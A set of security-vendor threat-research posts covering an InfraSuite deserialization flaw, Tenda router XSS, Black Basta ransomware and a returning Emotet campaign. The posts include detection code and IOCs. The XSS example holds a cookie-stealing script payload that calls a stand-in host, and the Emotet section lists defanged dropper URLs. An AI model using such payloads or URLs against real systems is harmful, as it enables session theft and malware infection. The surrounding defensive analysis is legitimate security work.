SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2606 Apache Airflow DAG Command Injection 1
  • IPS: 2607 Apache Airflow DAG Command Injection 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Filtering traffic based on the signatures above.
    • Deleting the vulnerable DAG.
    • Minimizing the number of users with the RESOURCE_DAG_RUN permission.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Delta Electronics Deserialization Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Delta Electronics InfraSuite Device Master is a tool for centralized monitoring and control of a large number of devices. Users create a human-machine interface (HMI) to manage the devices, observe the status of all devices and query event logs or historical data, and the tool assists them in taking appropriate action. InfraSuite Device Master implements a 3-tiered architecture consisting of the Data Collection layer, the Gateway layer and the Presentation layer.

  An insecure deserialization vulnerability exists in Delta Electronics InfraSuite Device Master. The vulnerability is due to missing input validation when processing messages sent to the Device-DataCollect service.

  A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation allows arbitrary code execution with privileges of the user running the vulnerable software.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-38142.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability is due to a combination of two issues: no authentication is required to reach the exposed Device-DataCollect service, and the service deserializes the messages it receives insecurely. When a BinaryFormatter-serialized request is sent to DeviceDataCollect, the InfraSuiteManager.Common.PacketHeader object is deserialized by the vulnerable method DeSerializeBinary() in the .NET class InfraSuiteManger.Common.Serialization, called from the method CheckPacket() in the .NET class InfraSuiteManager.Common.PacketOperation.

  Next, the method DoUpperLayerNWPacket() in InfraSuiteManager.DataCollectionLayer.DataCollectionLayerMngt is called from the MainLoop() method in the same class to process the packet payload object which is expected to be one of the objects of type:

  InfraSuiteManager.Common.DCLayerNWCommand_DeviceObject,
  InfraSuiteManager.Common.DCLayerNWCommand_Protocol,
  InfraSuiteManager.Common.DCLayerNWCommand_Polling,
  InfraSuiteManager.Common.DCLayerNWCommand_Server,
  InfraSuiteManager.Common.DCLayerNWCommand_DCServerSand,
  InfraSuiteManager.Common.DCLayerNWCommand_LogPollingRawData

  This method will call one of the methods: DCLayerNWCommand_DeviceObject(), DCLayerNWCommand_Protocol(), DCLayerNWCommand_Polling(), DCLayerNWCommand_Server(), DCLayerNWCommand_DCServerStatus() or DCLayerNWCommand_LogPollingRawData(), dependent on the value of the i32PayloadType field in the InfraSuiteManager.Common.PacketHeader object. Each of these methods call the vulnerable method DeSerializeBinary() in .NET class InfraSuiteManger.Common.Serialization.

  The vulnerable method DeSerializeBinary() invokes System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(), where the insecure deserialization occurs. The code performs no checks on the type or contents of the serialized object, so an attacker can use the ysoserial.net gadget generator to craft a malicious payload in place of the PacketHeader or packet payload object, leading to arbitrary code execution.

  ysoserial

Triggering the Problem:

  • The target must have the vulnerable software installed.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  The attacker sends a malicious serialized payload to the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • Device-DataCollect Protocol

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2063 Delta Electronics InfraSuite Device Master Insecure Deserialization

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Detecting and filtering malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  ICS-CERT Advisory

Tenda AC1200 Cross-Site Scripting

Tenda products include home networking, business networking, switch, broadband CPE, gateway, powerlines, mobile broadband and IP cameras. Tenda offers AC1200 routers as well. AC means that the router has support for the 802.11ac (or Wi-Fi 5) wireless networking standard, which offers fast WiFi network connections on the 5GHz frequency. The number that comes after AC represents the maximum theoretical bandwidth of the router with 1200 representing 1200 Mbps.

Cross-Site Scripting
Cross-Site Scripting (XSS) attacks are a type of injection attack that occurs when malicious scripts are injected into otherwise benign and trusted websites. An attacker then uses a web application to send malicious code, generally in the form of a browser side script, to the end user.

Reflected XSS abuses the dynamic way websites interact with browsers: content provided or controlled by a user, such as a URL parameter or an input field value, is echoed back in the response without proper encoding. An attacker who gets a victim to open a crafted link thereby controls what the victim’s browser executes in the context of the vulnerable website.

Stored XSS occurs when the injected script is permanently stored on the target servers via a database, message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.

Tenda Cross-Site Scripting Vulnerability | CVE-2022-40846
The Tenda AC1200 is vulnerable to both reflected and stored XSS.
The Tenda AC1200 router does not perform proper validation of user-supplied input and is vulnerable to cross-site scripting attacks via the homepage’s connected application hostname field. This vulnerability exists in the remote web management console.

As seen above, the XSS triggers and discloses session cookie information.
The Tenda AC1200 is also vulnerable to stored XSS in the website filtering functionality (CVE-2022-40844). The URL management panel of the website filter accepts and stores any input without proper validation; anything injected in the URL body is stored and rendered back once its associated group name is clicked in the panel.
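Both the reflected case (the hostname rendered on the status page) and the stored case (the URL filter entry rendered when its group is clicked) come down to the same missing step: encoding untrusted values for the HTML context they land in. The following Python is an added example, not Tenda firmware code: it renders a constructed list of DHCP clients once without encoding and once with html.escape, and adds an input-side hostname check for values that are meant to be stored. The client entries and the payload are constructed for the example.

```python
import html
import re

# Constructed DHCP client entries as a router status page would list them; the second
# hostname is an XSS payload a client can supply as its DHCP hostname (hypothetical).
XSS_PAYLOAD = '<script>new Image().src="http://192.0.2.10/?c="+document.cookie</script>'
SAMPLE_CLIENTS = [
    {"hostname": "laptop-01", "ip": "192.168.0.10"},
    {"hostname": XSS_PAYLOAD, "ip": "192.168.0.11"},
]

# RFC 1123 label: 1-63 alphanumerics or hyphens, not starting or ending with a hyphen.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def render_clients_vulnerable(clients) -> str:
    """Interpolates attacker-controlled fields straight into HTML (the defect)."""
    rows = "".join(f"<tr><td>{c['hostname']}</td><td>{c['ip']}</td></tr>" for c in clients)
    return f"<table>{rows}</table>"


def render_clients_hardened(clients) -> str:
    """Same page, with every untrusted value encoded for the HTML element context."""
    rows = "".join(
        f"<tr><td>{html.escape(c['hostname'], quote=True)}</td>"
        f"<td>{html.escape(c['ip'], quote=True)}</td></tr>"
        for c in clients
    )
    return f"<table>{rows}</table>"


def valid_hostname(name: str) -> bool:
    """Input-side check for values that will be stored: reject anything not shaped like a hostname."""
    return 0 < len(name) <= 253 and all(LABEL_RE.match(label) for label in name.split("."))


def accept_hostname(name: str) -> str:
    if not valid_hostname(name):
        raise ValueError(f"rejected hostname: {name!r}")
    return name


if __name__ == "__main__":
    print(render_clients_vulnerable(SAMPLE_CLIENTS))
    print(render_clients_hardened(SAMPLE_CLIENTS))
```

Output encoding is the fix that actually closes the bug, because a hostname that fails validation still has to be displayed somewhere (a log, an error page) and every such sink needs the same encoding. The validation is defence in depth for the stored case, where a bad value would otherwise sit in flash and fire every time the panel is opened.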
A quick check on Shodan reveals Internet-exposed devices of this model:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 18814: Tenda AC1200 Cross-Site Scripting

TOR chat with Black Basta ransomware operator runs dry

The SonicWall Capture Labs threat research team has recently been tracking a ransomware family called Black Basta. Black Basta first appeared in April 2022 and is believed to be operated by the well-organized cybercrime group Fin7. It has been reported that this group has already breached over 90 organizations and caused over US$1 billion in damage.

 

Infection Cycle:

 

Upon execution, a console appears with the following text:

 

It then detaches from the console using the FreeConsole Windows API, which stops further console output:

 

It obtains information about storage volumes attached to the system and begins its encryption process:

 

Encrypted files are given a “.basta” file extension.

 

The malware uses RSA encryption. The RSA key is hard-coded and can be seen in the decompiled binary:

 

Various configuration options can also be seen in the decompiled code:

 

In order to prevent system recovery, the malware deletes volume shadow copies using the vssadmin.exe program:

 

The malware drops dlaksjdoiq.jpg

 

dlaksjdoiq.jpg contains the following image:

 

A ransom message is written to readme.txt.  This file is copied into all directories containing encrypted files:

 

readme.txt contains the following ransom message:

 

fkdjsadasd.ico is dropped onto the system:

 

It contains the following icon:

 

The Tor link leads to the following page:

 

After logging in using the requested information, a chat interface is presented:

 

We had the following conversation with the attacker but were unable to obtain information about file retrieval costs:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: BlackBasta.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Emotet Is Back!

Introduction

After a hiatus of several months, Emotet is back. Starting last week, the SonicWall Capture Labs threat research team has observed that the notorious malware, which heavily targets large organizations, has returned with tactics and functionality similar to those of past variants. Originally a banking trojan, Emotet has evolved into a dropper-type class of malware. It spreads through malicious Microsoft Office documents sent via email; where earlier campaigns used JavaScript, the current ones rely on Office macros to compromise victims’ machines.

Figure 1: Infection Chain

Infection Vector

The infection vector is Excel 4.0 (XLM) macros, with the malicious code distributed across spreadsheet cells. By default the Excel file opens in Protected View with macros disabled, so the Emotet Excel files carry an image with instructions (Figure 2) asking the user to copy the file to the <Microsoft Office>\Templates folder and open it again. That folder is a trusted location for Office, so once the file is opened from there the macros run without a further security prompt; the only user interaction required is the copy.

Figure 2: Malicious document warning. The required actions infect the machine.

The macro code contains multiple URLs from which the Emotet dropper DLL is downloaded.
URLs:
hxxp://app.clubdedocentes[.]com/storage/DCcq9ekgH99sI/
hxxp://linhkiendoc[.]com/app/payments/qoy5JqpLqrbsKl/
hxxp://sourcecool[.]com/throng/iOD/
hxxp://www.stickers-et-deco[.]com/Adapter/lYw/

Only 3 of these 4 URLs were active at the time of analysis. They delivered 3 Emotet dropper DLLs with similar functionality. The DLLs are executed using regsvr32.exe.

Figure 3: View of the malicious VBA macro

DLL Analysis

Emotet is known for distributing many different malware families. During the analysis of the two samples, no additional malware was observed being dropped or downloaded.

Sample 1

The dropper DLL contains highly obfuscated custom packer code, including the encrypted main Emotet DLL. Its import list contains multiple APIs known to be used by malware, covering monitoring, enumeration, execution, encryption, persistence and exfiltration. Multiple APIs are loaded using DWORDs stored in memory (Figure 4).

Figure 4: Packed code shown in x64dbg

A custom decryption loop decrypts the main Emotet DLL using the key “vGZlfkkg?U^>+xzU”. Once executed via regsvr32.exe, the DLL is moved and renamed to the “~\AppData\Local” and/or “\Windows\System32\” location with a randomized name for both the parent folder and the file itself. A registry key is then created so the DLL autoruns when the system is restarted (Figure 5).

Figure 5: Run Entry created for persistence

The process then attempts to reach out to multiple IP addresses, sending a generated cookie and the collected data. After initial communication with the CnC servers, it downloads the Emotet spammer module to the same folder or to the “Appdata” directory. For further spreading, the spammer module uses multiple malicious email templates like the one shown in Figure 6 below.

Figure 6: Email Template

It also uses a number of email domains, email addresses and their passwords, along with other information including malicious email attachments, to spread across domains, as seen in Figure 7.

Figure 7: Email Addresses and Passwords

This illustrates the malware’s redistribution mechanism: already compromised email credentials are used to infect further victims.

Sample 2

This sample was a separate DLL file that differed from the first in both code and behavior. Manually running the decryption function produced a DLL in newly allocated memory; instead of a randomly named file, it is called ‘clover.dll’ (Figure 8) and differs from the dropper in multiple ways.

Figure 8: Clover.dll allocated in memory


The first point is that when clover.dll is dropped, it lacks several of the anti-analysis features that the original has; notably, one can go directly to the entry point in a debugger without the program terminating itself. There is also a string that produced only two Google results (f:\rtm\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl), both of which are samples on AlienVault OTX [i][ii].

Running ‘clover.dll’ with regsvr32.exe results in the same behavior as the dropper sample: it is moved to ~AppData\Local, a registry key is created for persistence, and system enumeration begins. Regsvr32 then spawns a child process and kills the parent (Figure 9), becoming a ‘non-existent process’; this anti-analysis technique prevents debuggers from attaching to the process.

Figure 9: This process does not exist (to a debugger)
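The persistence chain described for both samples (regsvr32.exe running a DLL from a randomly named folder under AppData\Local, then a Run key pointing back at it) can be spotted from process-creation and registry telemetry. The following is an added example, not code from the SonicWall post; the events are constructed Sysmon-style records with simplified field names, and the folder and file names in them are made up.

```python
# Added example, not part of the SonicWall post: flag the Emotet persistence
# chain described above (regsvr32.exe executing a DLL from a randomly named
# folder under AppData\Local, then a Run key pointing back at that DLL).
# The events are constructed, Sysmon-style records (1 = process create,
# 13 = registry value set) with simplified field names, not real telemetry.
import re

EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe C:\Users\bob\AppData\Local\Qxkwpz\Vtrmeq.dll"},
    {"id": 13,
     "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Vtrmeq",
     "value": r"C:\Windows\System32\regsvr32.exe C:\Users\bob\AppData\Local\Qxkwpz\Vtrmeq.dll"},
    {"id": 1, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\legit.dll"},  # benign control
]

# A DLL two levels below AppData\Local: <random folder>\<random name>.dll
DLL_IN_APPDATA = re.compile(
    r"(?i)[a-z]:\\users\\[^\\]+\\appdata\\local\\[^\\\s]+\\[^\\\s]+\.dll")
RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run\\")


def dll_from_appdata(text):
    """Return the normalised AppData\\Local DLL path found in text, or None."""
    m = DLL_IN_APPDATA.search(text)
    return m.group(0).lower() if m else None


def detect_emotet_persistence(events):
    """Return (reason, dll_path) findings; a Run key that references a DLL
    regsvr32 already executed is reported as the complete chain."""
    findings, executed = [], set()
    for ev in events:
        if ev["id"] == 1 and ev["image"].lower().endswith(r"\regsvr32.exe"):
            dll = dll_from_appdata(ev["cmdline"])
            if dll:
                executed.add(dll)
                findings.append(("regsvr32 executing DLL from AppData\\Local", dll))
        elif ev["id"] == 13 and RUN_KEY.search(ev["key"]):
            dll = dll_from_appdata(ev["value"])
            if dll and "regsvr32" in ev["value"].lower():
                reason = ("Run key completes chain: DLL already run via regsvr32"
                          if dll in executed else "Run key launches AppData DLL via regsvr32")
                findings.append((reason, dll))
    return findings


if __name__ == "__main__":
    for reason, path in detect_emotet_persistence(EVENTS):
        print(f"{reason}: {path}")
```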

The second point to note is how Emotet communicates with its C2 servers: it uses regsvr32.exe to send TCP requests. None of the tools normally used for packet capture (Fiddler, Wireshark, TCPMon) show the traffic; only Procmon does. The entire exchange takes place within 2-3 ms, as seen in Figures 10 and 11. Attempts to use netstat also failed.

Figure 10: Procmon output of TCP communications

Figure 11: Timestamps from beginning to end

Looking at the runtime memory of regsvr32, a large list of C2 addresses was found (Figure 12), along with cookie information and public keys.

Figure 12: Beginning of C2 list in private-mapped memory
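The two public keys recovered from this memory are reproduced under IOCs below. Decoded, each begins with a Windows BCRYPT_ECCKEY_BLOB header (magic ‘ECK1’ for an ECDH P-256 public key, ‘ECS1’ for an ECDSA P-256 public key, then a 32-bit coordinate length of 32) followed by the X and Y coordinates; the following added example (not code from the SonicWall post) parses them and sanity-checks that the point lies on P-256. It assumes the 8 bytes past the 72-byte structure are extra memory content and simply reports them.

```python
# Added example, not part of the SonicWall post: decode the two public keys
# listed in the IOCs. Decoded, each starts with a Windows BCRYPT_ECCKEY_BLOB
# header: 4-byte magic ('ECK1' = ECDH P-256 public key, 'ECS1' = ECDSA P-256
# public key) and a little-endian 32-bit coordinate length of 32, followed by
# the X and Y coordinates (big-endian). Bytes beyond that 72-byte structure
# are kept as `trailing`; they are assumed to be extra memory content.
import base64
import struct
from dataclasses import dataclass

MAGIC = {b"ECK1": "ECDH_P256_PUBLIC", b"ECS1": "ECDSA_P256_PUBLIC"}

# NIST P-256 field prime and curve constant b (a = -3), used only for a
# sanity check that the decoded point actually lies on the curve.
P256_P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
P256_B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b

# The two strings exactly as given in the post's IOC section.
EMOTET_KEYS = [
    "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5z/VpKQADAJA=",
    "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2a/UNKQAXAJA=",
]


@dataclass
class EccPublicKey:
    kind: str
    x: int
    y: int
    trailing: bytes

    def on_curve(self) -> bool:
        """True if y^2 == x^3 - 3x + b (mod p); a key transcribed intact passes."""
        rhs = pow(self.x, 3, P256_P) - 3 * self.x + P256_B
        return (self.y * self.y - rhs) % P256_P == 0


def parse_bcrypt_ecc_blob(b64: str) -> EccPublicKey:
    raw = base64.b64decode(b64)
    magic, cb_key = struct.unpack_from("<4sI", raw, 0)
    if magic not in MAGIC:
        raise ValueError(f"unexpected magic {magic!r}")
    if cb_key != 32 or len(raw) < 8 + 2 * cb_key:
        raise ValueError("not a complete P-256 public key blob")
    x = int.from_bytes(raw[8:8 + cb_key], "big")
    y = int.from_bytes(raw[8 + cb_key:8 + 2 * cb_key], "big")
    return EccPublicKey(MAGIC[magic], x, y, raw[8 + 2 * cb_key:])


if __name__ == "__main__":
    for b64 in EMOTET_KEYS:
        k = parse_bcrypt_ecc_blob(b64)
        print(f"{k.kind}: x={k.x:064x} y={k.y:064x} "
              f"trailing={k.trailing.hex()} on_curve={k.on_curve()}")
```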


SonicWall Real Time Deep Memory Inspection (RTDMI) detects the malicious Excel spreadsheet in Capture ATP. The Emotet dropper, Emotet DLL and spammer module are also detected by RTDMI.

Evidence of detection by the RTDMI™ engine for the Emotet DLL can be seen in the screenshot below:

Figure 13: RTDMI ATP Report results

IOCs

SHA256:

C2 IP Addresses:


Public Keys:

RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5z/VpKQADAJA=
RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2a/UNKQAXAJA=

JA3 fingerprint:

8916410db85077a5460817142dcbc8de

Cookies:

WnnMFWF=0d3850HcEUxB57edscLqHsb2YxPDCKbPSZncMTx3O0h9lQgJCvRMC//BrnYhPFxgMRGCoZSHhMyTtzRWyGhLZIyda+8qlUGgEDzQZ0FNyFIFUjbe0aBVe6vknvoT1bSoMmylmeeNjwtPr1DVQt8JBHpbWAXjxP+zpYCEPYLK2b02cC0/cJtzfFLcECfpMT9WAGpj2uFr6QqpTPIivkS/Ta2r9sHA20takVBoZ9TbfwVVtlUfqlozgTltkAtCazcU/W8R9mfAVM1Y

Qs=0WODCSXcomwJtgWqI5e4bPB3yrdQoAEow+xn5MRK9/ao9xobva9p8/jpU6RvJLwBpREszZe6f224Qoc20YVdaKXLpEoD+CwRklu0H7XCKQZe8V+CPjtzCo5fzkDm2SHBIMJmPkIdY0HZvSGjXBvSwpA74U8FBJdbzKmUSvZKeLE2D1zGVF25KW5b0s+FQ9ah7qgmwJxNkXCL7cbrL73Cnqi5G3XPALWmwxxRbX2F/rzzDxIkkxHSBI7ggXr5ndl799lGGQd4F0v171zhI+/VNrTtpcEnZM5drvJsD/wrrEGBY7NJUGIom7MjeZtu8/cOx+TR

[i] https://otx.alienvault.com/indicator/file/7fbcad6af8fc4b6aa18f877feabcfc31b0a4b1a4895ccaf70a90bceaff9331d2/

[ii] https://otx.alienvault.com/indicator/file/f8fa14b1f1d267d5c348d97f516ea9e6912f8747a6e659b45c428d931082f6e6